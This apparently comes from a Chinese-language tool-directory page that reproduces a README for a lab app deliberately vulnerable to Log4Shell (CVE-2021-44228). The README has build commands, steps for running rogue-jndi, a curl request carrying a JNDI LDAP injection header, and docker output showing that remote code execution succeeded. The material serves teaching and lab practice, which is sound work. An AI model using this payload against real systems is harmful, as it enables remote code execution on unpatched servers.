Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/kadantte/cve-2021-44228-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用学习与教育实验室与实践
GitHubkadantte/cve-2021-44228-poc

CVE-2021-44228-poc

log4shell 示例应用程序 (CVE-2021-44228)

查看仓库
434年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Log4Shell 示例易受攻击的应用程序(CVE-2021-44228)

这是一个几乎复制/类似的易受攻击应用程序,来源为 https://github.com/christophetd/log4shell-vulnerable-app

主要区别在于使用 maven 而不是 gradle,以及使用 rogue-jndi。

此仓库包含一个易受 CVE-2021-44228 攻击的 maven Spring Boot Web 应用程序,该漏洞被昵称为 Log4Shell。

它使用 Log4j 2.6.1 和 JDK 1.8.0_181 版本。

运行 springboot 应用程序

构建并运行 docker springboot 应用程序:

root@kitploit:~
docker build . -t vulnerable-app
docker run -p 8080:8080 vulnerable-app

漏洞利用

  1. git clone https://github.com/veracode-research/rogue-jndi
  2. cd rogue-jndi
  3. mvn package
  4. java -jar target/RogueJndi-1.1.jar --command "touch /tmp/test_if_rce" --hostname "192.168.1.x"

打开第二个终端

  1. curl localhost:8080 -H 'X-Api-Version: ${jndi:ldap://192.168.1.x:1389/o=reference}'

在这两种情况下,192.168.1.x 都是你的 IP

注意:不要使用 localhost,请使用你实际的私有 IP 地址。

现在检查 RCE 是否成功:

root@kitploit:~
$ docker ps                                 
CONTAINER ID   IMAGE            COMMAND                  CREATED         STATUS         PORTS                                       NAMES
04536dbd1dff   vulnerable-app   "java -jar demo-0.0.…"   2 minutes ago   Up 2 minutes   0.0.0.0:8080->8080/tcp, :::8080->8080/tcp   gallant_easley
root@kitploit:~
$ docker container exec -it 04536dbd1dff ash
/opt/app # ls /tmp
hsperfdata_root                          tomcat-docbase.8080.4585569232401237075
test_if_rce                              tomcat.8080.1707298461175346507

如你所见,文件 test_if_rce 存在。这意味着 RCE 已成功。

注意

代码和思路来自以下仓库:

  • https://github.com/rayhan0x01/log4shell-vulnerable-app/tree/mod

  • https://www.lunasec.io/docs/blog/log4j-zero-day/

  • https://github.com/christophetd/log4shell-vulnerable-app

下载工具